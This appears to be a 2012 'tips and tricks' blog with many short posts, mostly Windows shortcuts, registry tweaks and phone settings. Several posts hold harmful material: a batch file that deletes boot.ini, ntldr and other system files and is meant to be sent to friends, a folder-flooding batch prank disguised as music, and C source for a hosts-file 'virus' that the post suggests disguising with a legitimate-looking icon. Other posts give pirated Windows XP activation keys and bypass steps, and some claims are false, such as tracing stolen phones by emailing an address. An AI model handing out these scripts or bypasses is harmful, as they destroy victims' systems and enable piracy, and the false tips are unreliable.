Stop Timer in Minesweeper
Saturday, March 24, 2012
Posted by Priya Yadav
Minesweeper secret
Saturday, March 24, 2012
Posted by Priya Yadav
Zooming in and out in Browser
Saturday, March 24, 2012
Posted by Priya Yadav
Hold Ctrl key and use the up/down scroll of the mouse wheel to zoom in and out in any browser.
To reset to the origianl font size hold Ctrl key and press 0. (Ctrl + 0)
Changing Startup and Log-off screens
Saturday, March 24, 2012
Posted by Priya Yadav
- Create a 320x400 bitmap in the root directory and name it LOGO.SYS
- You can use LOGOW.SYS file in the Windows directory as a starter
- There are many system file that constitutes Lofoff screen.
- They are actually bitmaps 320x400 that just have a different extension
- The hidden file in the root directory LOGO.SYS is the startup logo.
- There are two files in the Windows directory.
- LOGOW.SYS is the Wait while Shutting down ... screen.
- LOGOS.SYS is the You may now shut-off or Reboot screen.
- Make two new image files of your chice in Paint and name it as LOGOW.SYS and LOGOS.SYS and replce the actual windows file by this two.
- But make sure they should be of the same size
To unlock your phone
Saturday, March 24, 2012
Posted by Priya Yadav
now type *#9998*3323# it will reset your phone. Push exit and then push 7,
it will reset again. Put your other sim in and it will say sim lock,
type in 00000000 then it should be unlocked. Type in *0141# then
the green call batton and it's unlocked to all networks.
This code may not work on the older phones and some of the newer phones.
If it doesn't work you will have to reset your phone without a sim in it
by typing *#2767*2878# or *#9998*3855# (not tested)
Other Samsung Codes
Saturday, March 24, 2012
Posted by Priya Yadav
*#9998*5282# Java menu (GRPS/CSD settings for JAVA server)
*#9999#0# Monitor Mode
*#9999# or *#9998*9999# Software Version
*#8888# or *#9998*8888# Hardware Version
*#9998*746# or *#9998*0746# or *#0746# Sim Infos
*#9998*523# or *#9998*0523# or *#0523# Display Contrast
*#9998*842# or *#9998*0842# or *#0842# Vibration On (until you push OK)
*#9998*289# or *#9998*0289# or *#0289# Buzzer On (until you push OK)
*#9998*288# or *#9998*0288# or *#0288# Battery & Field Infos
*#9998*377# or *#9998*0377# Error log
*#9998*778# or *#9998*0778# or *#0778# Sim Service table
*#9998*782# show date and alarm clock
*#8999*638# show network information
*#9998*5646# change operator logo at startup
*#9998*76# production number
*#9998*968# view melody for alarm
*#9998*585# Non-Volatile Memory (NVM)
*#3243948# Digital Audio Interference Off
*#32436837# Digital Audio Interference On
Unlock any phone Security code
Saturday, March 24, 2012
Posted by Priya Yadav
‘Read the full post before trying this’
Think how worse wiill that be if you do not know the security code of your own cell phone?i.e. If you have forgotten or If someone might have changed it.
Do not worry I will let you know about the procedure to unlock your locked Nokia(for other phones see the next method below this) phone with a “MASTER CODE” (Note: This wont work for some Models).
For NOKIA :-
You can get “Nokia MASTER CODE” for your phone using ur
phone’s IMEI.
After getting IMEI CODE
Visit:
www.nokiamastercode.com/
or
www.nokialockcode.com/mastercode.php
or
www.nokialockcode.com/calculate.php
After getting your phone’s master code use it in the place of security code.
If this does not work try the another trick given below.
“For Nokia,Sony,Alcatel ,Siemens, Vitel, Maxel, Panasonic, AEG, Samsung, Motorola and LG” :-
For other phone models including nokia this trick looks comfortable than the above one.
First of all for you is to download a 150kb “MASTER CODE UNLOCKER” to your computer and then you can get the master code for your phone. upon which you can use it to unlock phone.
If you still find any problem with the Code generation. Feel free to contact me on xtremecoder64@gmail.com.
make your pc faster than before
Saturday, March 24, 2012
Posted by Priya Yadav
# Go to start then click run and then type regedit
# Select HKEY_CURRENT_USER and then select control panel folder and then select desktop folder. Do it correctly
# You will see registry setting at your right hand side, after that select menu show delay and then right click and select modify.
# you will find edit string option -----> default value data is 400 , you have to change the value Data to 000
# Restart your computer. You will notice that your computer has become much more faster.
(Note : This will help you to start your computer start quickly,
How to modify any exe files
Saturday, March 24, 2012
Posted by Priya Yadav
1) Don't try to modify a prog by editing his source in a dissasembler.Why?
Cause that's for programmers and assembly experts only.
try to view it in hex you'll only get tons of crap you don't understand.
First off, you need Resource Hacker(last version). It's a resource editor-
very easy to use, You can download it at h**p://www.users.on.net/johnson/resourcehacker/
2) Unzip the archive, and run ResHacker.exe. You can check out the help file too
3) You will see that the interface is simple and clean. Go to the menu FileOpen or press Ctrl+O to open a file. Browse your way to the file you would like to edit. You can edit *.exe, *.dll, *.ocx, *.scr and *.cpl files, but this tutorial is to teach you how to edit *.exe files, so open one.
4) In the left side of the screen a list of sections will appear.
The most common sections are
-String table;
-RCData;
-Dialog;
-Cursor group;
-Bitmap;
-WAV.
*Icon: You can wiew and change the icon(s) of the program by double-clicking the icon section,chossing the icon, right-clicking on it an pressing "replace resource". After that you can choose the icon you want to replace the original with.
*String table: a bunch of crap, useful sometimes, basic programming knowladge needed.
*RCData: Here the real hacking begins. Modify window titles, buttons, text, and lots more!
*Dialog:Here you can modify the messages or dialogs that appear in a program. Don't forget to press "Compile" when you're done!
*Cursor group: Change the mouse cursors used in the program just like you would change the icon.
*Bitmap: View or change images in the programs easy!
*WAV:Change the sounds in the prog. with your own.
5) In the RCData,Dialog,Menu and String table sections you can do a lot of changes. You can modify or translate the text change links, change buttons, etc.
TIP: To change a window title, search for something like: CAPTION "edit this".
TIP: After all operations press the "Compile Script" button, and when you're done editing save, your work @ FileSave(Save as).
TIP: When you save a file,the original file will be backed up by default and renamed to Name_original and the saved file will have the normal name of the changed prog.
TIP: Sometimes you may get a message like: "This program has a non-standard resource layout... it has probably been compressed with an .EXE compressor." That means that Resource Hacker can't modify it because of it's structure.
Create A Personal Screen Saver In Win Xp ! ! !
Saturday, March 24, 2012
Posted by Priya Yadav
1. Right-click an empty spot on your desktop and then click Properties.
2. Click the Screen Saver tab.
3. In the Screen saver list, click My Pictures Slide show.
4. Click Settings to make any adjustments, such as how often the pictures should change, what size they should be, and whether you'll use transition effects between pictures, and then click OK.
Now your screen saver is a random display of the pictures taken from your My Pictures folder.
How to copy songs from your iPod to your PC
Saturday, March 24, 2012
Posted by Priya Yadav
1. Connect the iPod to your PC. If iTunes starts syncing (ie erasing) your music automatically, hit the X in the upper right hand corner of iTunes display, to the left of the search box, to stop it.
2. In Control Panel, Portable Media Devices, double-click your iPod.
3. Navigate to the Music folder.
4. Select all the music folders, and drag and drop them into a folder on your hard drive, or directly into iTunes.
And you’re done! The iPod music folder structure is strange and inexplicable, but once you move your files into iTunes you can set it to automatically organize your folder by artist and album to clean that up. (To do this, in iTunes Edit menu, choose Preferences and in the Advanced tab, check “Keep iTunes Music Folder organized.”)
If you give this a go, lemme know how it goes. I’ll amend the instructions with any additional info for other versions of Windows and iPods.
Remote Shutdown
Saturday, March 24, 2012
Posted by Priya Yadav
Right click my computer, choose manage.
Highlight the Computer Management (Local) then click on Action, choose connect to another computer.
In the window that opens fill in the machine name of the PC you want to connect to and click ok.
Once connected right click on Computer Management (Remote machine name) and choose properties.
Go to the "Advanced" tab and click the Settings button under Start up and recovery.
Click on the Shutdown button.
Under action choose what you want to do (you can log off current user, shut down, restart, or power down. you can also choose if you want to force all applications to close, close hung apps, or wait for all apps to close by themselves).
The second way... Remember dos... that good old thing. Open up a command prompt and enter in the following:
%windir%\System32\shutdown.exe -r -m \\Machinename. The command prompt has more switches and options. I highly suggest using shutdown.exe /? to see all the possibilities.
Brand Windows with Your Name
Saturday, March 24, 2012
Posted by Priya Yadav
open notepad copy the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:
-------------------------------------------------------------------------------------
[General]
Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here
-------------------------------------------------------------------------------------
1. Save the file.
2. Then make a right click on my computer select properties, in the general tab a button will be highlighted (support information) make a click on it, you will be able to see the changes.
3. Now if you want to display some more information then simply increase the line in the file.
ex: Line4=Your Working Hours Here
Solitare Win Win
Saturday, March 24, 2012
Posted by Priya Yadav
POPUP “&Easter Egg”
{
MENUITEM "&Egg 1", 1008
MENUITEM "&Egg 2", 1009
MENUITEM "&Egg 3", 1010
}
Now, click the Compile Script button. Next, go to File > Save and save it in the original location, i.e., C:\Windows\System32\sol.exe. Also, replace sol.exe in the C:\Windows\System32\dllcache folder.
Now, a new menu Easter Egg appears with Egg 1, Egg 2 and Egg 3 as options. Click Egg 3 to force a win.
Disabling My Computer
Saturday, March 24, 2012
Posted by Priya Yadav
To disable this:
1.Open RegEdit
2.Search for 20D04FE0-3AEA-1069-A2D8-08002B30309D
3.This should bring you to the HKEY_CLASSES_ROOT\CLSID section
4.Delete the entire section.
Now when you click on My Computer, nothing will happen.
You might want to export this section to a Registry file before deleting it just in case you want to enable it again. You can also hide all the Desktop Icons, see Change/Add restrictions.
Trick to Make over 1,000 folders in few seconds
Thursday, March 22, 2012
Posted by Priya Yadav
1. Open notepad and type :
@echo off
:top
md %random%
goto top
@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creates folders with random names.
goto top – return to label :top, infinite loop.
2. Save it as 1000folders.bat
3. After that you will get icon that looks as show below:
People probably are not gonna click on an icon that looks like this picture, so to make it better (funnier and easier to prank people with) make a short-cut to it.
4. Right click on icon and click Create Shortcut.
5. Right click on shortcut and click properties , then click on Change Icon and rename icon.
Tell the person that you found the music they wanted and downloaded it on their computer. That way, they will think its a shortcut to the music and they will click on it. Then, they will think its loading so they won’t exit right away but when they finally realize its not going to load it will be to late. Its impossible to delete them using cmd you have to find all of them and delete them manually…
A Computer Tricks to Shut Down a Computer Forever
Thursday, March 22, 2012
Posted by Priya Yadav
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Now Save it as a .bat file.
This would shut down the person’s computer. It shuts it off once and deletes the files needed to reboot and restart.
* USe at your own risk
REMEMBER – DO NOT CLICK THIS FILE. YOU WON’T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!Send it to your friends computer and tell them to open it. Have fun!!
Shake Your Computer
Thursday, March 22, 2012
Posted by Priya Yadav
- Copy and paste the java script code to the address bar of your browser javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i–) {for (j = n; j > 0; j–) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)
2: Press enter and watch your window’s “shaking it”. You can change the value of i if you wish
Send free sms from your phone ( works on all networks )
Thursday, March 22, 2012
Posted by Priya Yadav
WhatsApp is an application that supports iphone,few selected nokia, All Android and Blackberry phones,
An awesome application that requires only active internet connection to send the messages, It uses push messaging technologies and offers chat style threaded messaging interface which makes it the best chat software available ever.
Here is what is needed to get started with whatsapp
1. A smartphone – android, blackberry, Iphone or Few selected nokia phones.
2. Working Internet connection on your phone (2g, 3g or wi-fi).
And you are all set to send free smses. The best part is it automatically adds contacts from the phonebook and displays the ones that already use whatsapp …
Headover to whatsapp.com to download this application for your phone.
Reliance GSM GPRS/WAP settings
Thursday, March 22, 2012
Posted by Priya Yadav
Login Request Required : off
Authentication : PAP
Data Compression : off
Header Compression : off
Service Name : rwap
Homepage/WAP Page : http://wap.rworld.co.in
Proxy : Yes
Proxy Server Address : 10.239.221.7
Port : 8080
User Name : [Empty]
Password : [Empty]
Alternate methodes:
You can also get the GPRS & MMS settings on your phone by sending
SMS [ALL to 55100] to receive WAP/GPRS/MMS settings (toll-free).
Or Else you may also send an SMS as “WAP” to 55100 to recieve wap/GPRS settings
Popular android phones and their price in India
Thursday, March 22, 2012
Posted by Priya Yadav
- HTC wildfire : 9500/-
- Samsung Galaxy ace : 12000/-
- HTC Tatto : 12000/-
- Samsung Galaxy 551 : 8800/-
- Motorola Defy : 13500/-
- HTC Desire S : 21500/-
- HTC Desire HD : 24500/-
- Samsung Galaxy S : 27000/-
- Motorola milestone : 17500/-
- Samsung Galaxy pop : 7750/-
Make Android to Android / Iphone Free VOIP phone Calls
Thursday, March 22, 2012
Posted by Priya Yadav
Iphone and Android phones ssupport loads of applications that allow you to make free phone to phone calls to other smartphone devices. But here is the trick; Both the devices should have internet i.e. wifi/3g/2g enabled and should be running the same applications on the phone.
Applications that support free phone to phone calls :
Skype:
Skype is world’s most popular PC to PC telephony service with more than 350 million users across the globe. Well thats old news; Good news is Skype has a mobile app. You can make free call to another user who is on skype using your mobile phone. If your friend is also a smartphone user (Android or Iphone) you can make free calls to them.
Download skype for your phone here :
http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/
Viber :
Viber is a mobile calling service that works on mobile phones with wifi & 3g internet. Viber not only supports free calling but also supports free text messaging to other viber users. You can also make Viber as a default dialer for your android phone.
Download Viber for your phone here :
http://www.viber.com/
Yahoo Messenger :
The yahoo messenger app for android also supports free calls to other devices running yahoo messenger.
In order to enjoy superior call-quality you should be using 3g, However 2g Edge networks of Vodafone & Airtel are good enough & give good speed to support voice call quality.
Free GPRS Settings FOR IDEA
Thursday, March 22, 2012
Posted by Priya Yadav
In order to use it over mobile phones, use following settings:
Primary ip : 10.4.42.15
Primary port : 9201
Secondary ip = blank
port = blank
user = blank
pass= blank
APN GPRS = imis
If other applications on your mobile such as Google Maps etc. stop working , you should try apn name as ” Internet “. It has worked for me.
If you have any issues do leave comments…
hide your important data from other users
Thursday, March 22, 2012
Posted by Priya Yadav
- To enable this feature, you will need to be logged into your computer with administrative rights.
-
- First click on Start button to open "Run" and type "CMD" (without the quotes) then press Ok button to open Command Prompt.
clear your sensitive information on system shutdown
Thursday, March 22, 2012
Posted by Priya Yadav
- To enable this feature, you will need to be logged into your computer with administrative rights.
- First click on start button to open control panel and then click here on "Administrative Tools" option.
- Now "Local Security Settings" panel will appear, on lift side of this panel click on "Local Policies".
- Here click on "Security Options" then double click on "Shutdown: Clear virtual memory pagefile" option.
- Now small dialog box will appear with options, "Enabled or Disabled" the page file.
- Select the "Enabled" radio button to set clear page file each time you shutdown computer.
Press Apply button to save settings and then click on Ok button to finish. -
Microsoft Windows shortcut keys
Thursday, March 22, 2012
Posted by Priya Yadav
Shortcut Keys | 3.x | 9x | ME | NT | 2K | XP | Vista | 7 | Description | |||
Alt + Tab | X | X | X | X | X | X | X | X | Switch between open applications. | |||
Alt + Shift + Tab | X | X | X | X | X | X | X | X | Switch backwards between open applications. | |||
Alt + double-click | X | X | X | X | X | X | X | Display the properties of the object you double-click on. For example, doing this on a file would display its properties. | ||||
Ctrl + Tab | X | X | X | X | X | X | X | X | Switches between program groups or document windows in applications that support this feature. | |||
Alt + Print Screen | X | X | X | X | X | X | X | X | Create a screen shot only for the program you are currently in. | |||
Ctrl + Print Screen | X | X | X | X | Creates a screen shot of the entire screen | |||||||
Ctrl + Alt + Del | X | X | X | X | X | X | X | X | Reboot the computer and brings up the Windows task manager. | |||
Ctrl + Shift + Esc | X | X | X | X | Immediately bring up the Windows task manager. | |||||||
Ctrl + Esc | X | X | X | X | X | X | X | X | Bring up the Windows Start menu. In Windows 3.x this would bring up the Task Manager. | |||
Alt + Esc | X | X | X | X | X | X | X | Switch Between open applications on taskbar. | ||||
F1 | X | X | X | X | X | X | X | X | Activates help for current open application. | |||
F2 | X | X | X | X | X | X | X | X | Renames selected Icon. | |||
F3 | X | X | X | X | X | X | X | Starts find from desktop. | ||||
F4 | X | X | X | X | X | X | X | Opens the drive selection when browsing. | ||||
F5 | X | X | X | X | X | X | X | Refresh Contents to where you were on the page. | ||||
Ctrl + F5 | X | X | Refreshes page to the beginning of the page. | |||||||||
F10 | X | X | X | X | X | X | X | X | Activates menu bar. | |||
Shift + F10 | X | X | X | X | X | X | X | Simulates right-click on selected item. | ||||
F4 | X | X | X | X | X | X | X | Select a different location to browse in the Windows Explorer toolbar. | ||||
Alt + F4 | X | X | X | X | X | X | X | X | Closes Current open program. | |||
Ctrl + F4 | X | X | X | X | X | X | X | X | Closes Window in Program. | |||
F6 | X | X | X | X | X | X | X | Move cursor to different Windows Explorer pane. | ||||
Alt + Space bar | X | X | X | X | X | X | X | X | Drops down the window control menu. | |||
Ctrl + (the '+' key on the keypad) | X | X | X | X | X | X | Automatically adjust the widths of all the columns in Windows explorer | |||||
Alt + Enter | X | X | X | X | X | X | X | Opens properties window of selected icon or program. | ||||
Alt + Space bar | X | X | X | X | X | X | X | Open the control menu for the current window open. | ||||
Shift + Del | X | X | X | X | X | X | X | Delete programs/files without throwing them into the recycle bin. | ||||
Holding Shift | X | X | X | X | X | X | X | X | Boot Safe Mode or by pass system files as the computer is booting. | |||
Holding Shift | X | X | X | X | X | X | X | When putting in an audio CD, will prevent CD Player from playing. | ||||
Enter | X | X | X | X | X | X | X | X | Activates the highlighted program. | |||
Alt + Down arrow | X | X | X | X | X | X | X | Display all available options on drop down menu. | ||||
* (on the keypad) | X | X | X | X | X | X | X | Expands all folders on the currently selected folder or drive in Windows Explorer. | ||||
+ (on the keypad) | X | X | X | X | X | X | X | Expands only the currently selected folder in Windows Explorer. | ||||
- (on the keypad) | X | X | X | X | X | X | X | Collapses the currently selected folder in Windows Explorer. |
What are the F1 through F12 keys
Thursday, March 22, 2012
Posted by Priya Yadav
- Almost always used as the help key, almost every program will open the help screen when this key is pressed.
- Enter CMOS Setup.
- Windows Key + F1 would open the Microsoft Windows help and support center.
- Open the Task Pane.
- In Windows commonly used to rename a highlighted icon or file.
- Alt + Ctrl + F2 opens document window in Microsoft Word.
- Ctrl + F2 displays the print preview window in Microsoft Word.
- Enter CMOS Setup.
- Often opens a search feature for many programs including Microsoft Windows.
- In MS-DOS or Windows command line F3 will repeat the last command.
- Shift + F3 will change the text in Microsoft Word from upper to lower case or a capital letter at the beginning of every word.
- Open find window.
- Repeat the last action performed (Word 2000+)
- Alt + F4 will close the program currently active in Microsoft Windows.
- Ctrl + F4 will close the open window within the current active window in Microsoft Windows.
- In all modern Internet browsers pressing F5 will refresh or reload the page or document window.
- Open the find, replace, and go to window in Microsoft Word.
- Starts a slideshow in PowerPoint.
- Move the cursor to the Address bar in Internet Explorer and Mozilla Firefox.
- Ctrl + Shift + F6 opens to another open Microsoft Word document.
- Commonly used to spell check and grammar check a document in Microsoft programs such as Microsoft Word, Outlook, etc.
- Shift + F7 runs a Thesaurus check on the word highlighted.
- Turns on Caret browsing in Mozilla Firefox.
- Function key used to enter the Windows startup menu, commonly used to access Windows Safe Mode.
- Opens the Measurements toolbar in Quark 5.0.
- In Microsoft Windows activates the menu bar of an open application.
- Shift + F10 is the same as right-clicking on a highlighted icon, file, or Internet link.
- Access the hidden recovery partition on HP and Sony computers.
- Enter CMOS Setup.
- Full-screen mode in all modern Internet browsers.
- Ctrl + F11 as computer is starting to access the hidden recovery partition on many Dell computers.
- Access the hidden recovery partition on eMachines, Gateway, and Lenovo computers.
- Open the Save as window in Microsoft Word.
- Shift + F12 save the Microsoft Word document.
- Ctrl + Shift + F12 prints a document in Microsoft Word.
- Preview a page in Microsoft Expression Web
- Open Firebug.
Basic PC shortcut keys
Thursday, March 22, 2012
Posted by Priya Yadav
Shortcut Keys | Description |
Alt + F | File menu options in current program. |
Alt + E | Edit options in current program |
F1 | Universal Help in almost every Windows program. |
Ctrl + A | Select all text. |
Ctrl + X | Cut selected item. |
Shift + Del | Cut selected item. |
Ctrl + C | Copy selected item. |
Ctrl + Ins | Copy selected item |
Ctrl + V | Paste |
Shift + Ins | Paste |
Home | Goes to beginning of current line. |
Ctrl + Home | Goes to beginning of document. |
End | Goes to end of current line. |
Ctrl + End | Goes to end of document. |
Shift + Home | Highlights from current position to beginning of line. |
Shift + End | Highlights from current position to end of line. |
Ctrl + Left arrow | Moves one word to the left at a time. |
Ctrl + Right arrow | Moves one word to the right at a time. |
Make your Computer Speak whatever you type.
Tuesday, March 20, 2012
Posted by Priya Yadav
This is an amazing trick to amaze your friends.By using this trick you can make your computer to speak whatever you type.This trick is working on all microsoft operating system and does not require any programming skills.You have to follow just simple steps and your own Text to Voice software will be ready.If you show this software to any of your friends he will be certainly impressed with you .
Ok, the trick is fairly simple and requires only 2 simple steps from your side.Let’s Begin the tutorial to Make Your Computer Speak Whatever You Type
here is a trick to convert your
TEXT to VOICE without any
software.
Steps are :
1) Go to Start > Run
2) Type : Control speech
Write any Text and then click on "Preview Voice" and it will be converted to voice.
I hope you enjoyed this trick
Track Stolen Mobile
Tuesday, March 20, 2012
Posted by Priya Yadav
Each mobile carries a unique IMEI i.e International Mobile Identity No which can be used to track your mobile anywhere in the world.
This is how it works!!!!!!
Dial *#06# from your mobile.
Your mobile shows a unique 15 digit .
Note down this no anywhere but except your mobile as this is the no which will help trace your mobile in case of a theft.
Once stolen you just have to mail this 15 digit IMEI no. to cop@vsnl.net
No need to go to police.
Mobile will be traced within next 24 hrs via a complex system of GPRS and internet.
Remove Stored username and Passwords !
Tuesday, March 20, 2012
Posted by Priya Yadav
1) Click Start, Run and type Control keymgr.dll
Remove the entries from the list.
2) Type Control Userpasswords2 in RUN box, click Advanced, Manage Passwords
3) From Control Panel, select your User Account, click Manage your network passwords
Reduce your system booting time!
Tuesday, March 20, 2012
Posted by Priya Yadav
First
-------------------------
1. Click at the Start icon
2. Then click run
3. type msconfig, which will open a new window.
4. select startup then check the programms which u wish to run at start up. Un check rest of them which u do not want to run at start up. After that restart your windows.
Second
--------------------------
open the folder c:windowstemp and then delete everything in it...... select all and delete
Third ( it will also increase your internet speed)
--------------------------
open documents and settings folder
then choose your login folder
then unhide everything from folder options
then you will find a folder local settings
then open the temp folder
then delete everything in it......... select all and delete
then come back to local settings folder
then open temp internet files folder
then delete everything in it......... select all and delete
At last re boot your machine...
DISPLAY MESSAGE ON STARTUP
Tuesday, March 20, 2012
Posted by Priya Yadav
Go to HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windo
Modify the key legalnoticecaption with what you want to name the window.
Modify the key legalnoticetext with what you want the window to say.
Restart and Enjoy!
Validate Your Non-Original Windows XP
Tuesday, March 20, 2012
Posted by Priya Yadav
2- Type in regedit and then ok
3- In the regedit, go to this following key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi
4- On the right panel, double click in OOBETimer
5- In the opened window delete all values and click OK. Shut the regedit
6- Go again in start > run and this time type:
%systemroot%\system32\oobe\msoobe.exe /a
7- In the window that oppened, choose the option... YES I WISH TO MAKE A PHONE CALL... ( or something similar to this sentence )
8- In the next step, click in the button that says CHANGE PRODUCT KEY ( or something similar )
9- In the next step, type a CD-Key:
THMPV-77D6F-94376-8HGKG-VRDRQ or JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ and click to update
10- After clicking in the update button, the assistant to activation will return one page, then click in " remember me later ", and restart Windows again.
11- Restart Windows, go again in start > run and type:
%systemroot%\system32\oobe\msoobe.exe /a
12- The following message will appear:
Windows activation
Windows is now activated
Trick to Post Empty Status on Facebook Trick to Post Empty Status on Facebook
Tuesday, March 20, 2012
Posted by Priya Yadav
How would you feel if you see a blank status update from someone? Amazed!!
You can’t write a blank status update by simply pressing the Space key and then clicking on Post button.Instead you have to use special codes to write a blank character in your facebook status.
Trick to Post Empty Status on Facebook:-
- Login to your Facebook Account and go to Update Status field.
- Press and hold Alt key and just type 0173.
- Release Alt Key and click on share Post.
- That’s all now your empty status will be update.
. How to Change the Logon Screen Background in Windows 7
Tuesday, March 20, 2012
Posted by Priya Yadav
LogonUI\Background
Browser Shaking
Tuesday, March 20, 2012
Posted by Priya Yadav
The trick is simply a small Java Script that causes your browser window to move to different positions, causing a shake of your entire screen. It's kind of cool to watch and see what Java Script can do! Try it out..
Use this trick at your own risk.
Here's how:
Copy this entire line and paste it onto your address box, then press Enter:
What to Do When Your Email Account is Hacked?
Monday, March 19, 2012
Posted by Priya Yadav
For Gmail:
2. Names of any 4 Labels that you may have created in your account
3. List of other services associated with your compromised account
4. Your last successful login date
5. Account created date
6. Last password that you remember and many more…
For Yahoo and Hotmail:
What is CAPTCHA and How it Works?
Monday, March 19, 2012
Posted by Priya Yadav
What Purpose does CAPTCHA Exactly Serve?
What is the Need to Create a Test that Can Tell Computers and Humans Apart?
Who Uses CAPTCHA?
Designing a CAPTCHA System
Breaking the CAPTCHA
How to Identify and Avoid Phishing Scams
Monday, March 19, 2012
Posted by Priya Yadav
Identifying a Phishing Scam
- You may receive an email which appears to have come from your bank or financial organization stating that “your bank account is limited due to an unauthorized activity. Please verify your account asap so as to avoid permanant suspension”. In most cases, you are requested to follow a link (URL) that takes you to spoofed webpage (similar to your bank website) and enter your login details over there.
- In some cases, phishing emails may ask you to make a phone call. There may be a person or an audio response waiting on the other side of the phone to take away your credit cards details, account number, social security number or other valuable data.
- papyal.com
- paypal.org
- verify-paypal.com
- xyz.com/paypal/verify-account/
Tips to Avoid Being a Victim of Phishing
Is your Nokia Cell Phone Original
Monday, March 19, 2012
Posted by Priya Yadav
IF the Seventh & Eighth digits of your cell phone are 02 or 20 this means your cell phone was assembled in Emirates which is very Bad quality
A Virus Program to Block Websites
Monday, March 19, 2012
Posted by Priya Yadav
his virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code
Here is the sourcecode of the virus.
---------------------------------------------------------------------------------------------------------
#include<stdio.h>
#include<dos.h>
#include<dir.h>
char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}
---------------------------------------------------------------------------------------------------------------
NOTE: You can also change the ICON of the virus to make it look like a legitimate program